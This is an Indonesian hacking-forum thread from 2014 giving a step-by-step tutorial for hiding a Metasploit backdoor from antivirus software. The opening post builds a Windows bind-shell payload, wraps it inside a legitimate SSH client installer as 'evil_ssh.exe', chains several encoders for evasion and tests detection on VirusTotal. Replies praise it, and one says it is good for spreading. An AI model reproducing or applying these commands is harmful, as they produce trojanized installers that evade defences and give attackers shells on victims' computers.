[Share] Bypass Antivirus Detection Making An Executable Fully Undetectable
#1
Oke kali ini saya akan jelaskan bagaimana membypass backdoor dari semua antivirus.

Tujuan :
Antivirus melindungi mesin dari malware tetapi tidak semuanya dengan cara untuk mengemas malware untuk membuat lebih sulit untuk dideteksi, dengan menggunakan metasploit untuk membuat malware sama sekali tak terlihat untuk antivirus.

Jalankan service postgresql dan metasploit

Code:
service postgresql start
service metasploit start

Creating Listener


Code:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

[Image: image.png]

Di folder /root akan tersimpan listen.exe

Encoding Listener

Code:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

Di folder /root akan tersimpan evil_ssh.exe

Code:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

Di folder /root akan tersimpan listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe

Setelah itu scan backdoor yang sudah kita buat di :
https://www.virustotal.com


Hasilnya :

[Image: image.png]


Terima Kasih.
Maaf kalo repost.
DO YOU KNOW ME...???
YES I AM CLOUDNINE
JUST pengguna baru ON CYBER WORLD

#2
Anjret sekarang kok gak kedetect virus ya, gw make encode 4 encode sama kaya lu dulu kena virus tuh. ahahah +1 dari gw

#3
(08-15-2014, 07:19 PM)czeroo_cool Wrote: Anjret sekarang kok gak kedetect virus ya, gw make encode 4 encode sama kaya lu dulu kena virus tuh. ahahah +1 dari gw

Terima kasih bro....
sekarang udah keren bro,,,makin maknyuss...
DO YOU KNOW ME...???
YES I AM CLOUDNINE
JUST pengguna baru ON CYBER WORLD

#4
+1 dari ane
mantap bro
ane compile automatis aja ya tar Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#5
(08-16-2014, 10:30 PM)wine trochanter Wrote: +1 dari ane
mantap bro
ane compile automatis aja ya tar Big Grin

makasih bro..
oke bro bener, biar gampang.....
DO YOU KNOW ME...???
YES I AM CLOUDNINE
JUST pengguna baru ON CYBER WORLD

#6
wah mantap nih buat ditebar haha.. thanks bro tutsnya hehe..

#7
Mantep wa tutornya....ane kalah start lagi aja ni..
Oy oy oyyyy...kumpulin tutorial tutorialnya tar kalo ane dah beres KKN mau merapat ke markas mau berguru sambil ngoprek bareng lagi

#8
(08-20-2014, 07:05 AM)kunang Wrote: Mantep wa tutornya....ane kalah start lagi aja ni..
Oy oy oyyyy...kumpulin tutorial tutorialnya tar kalo ane dah beres KKN mau merapat ke markas mau berguru sambil ngoprek bareng lagi

hayu tanggal 5-6 September 2014 bantuin gw....

(08-20-2014, 06:10 AM)dimascyber4rt Wrote: wah mantap nih buat ditebar haha.. thanks bro tutsnya hehe..

oke bro sama2 silahkan jajal ya bro...
DO YOU KNOW ME...???
YES I AM CLOUDNINE
JUST pengguna baru ON CYBER WORLD

#9
NAH kalau yang APK bisa Gk om?

#10
mantap nih, langsung tak praktekin.
Thanks om... Smile
"Kesadaran Beragama, Berilmu, Bermasyarakat, Berbangsa, Bernegara, dan Berorganisasi"





Users browsing this thread: 1 Guest(s)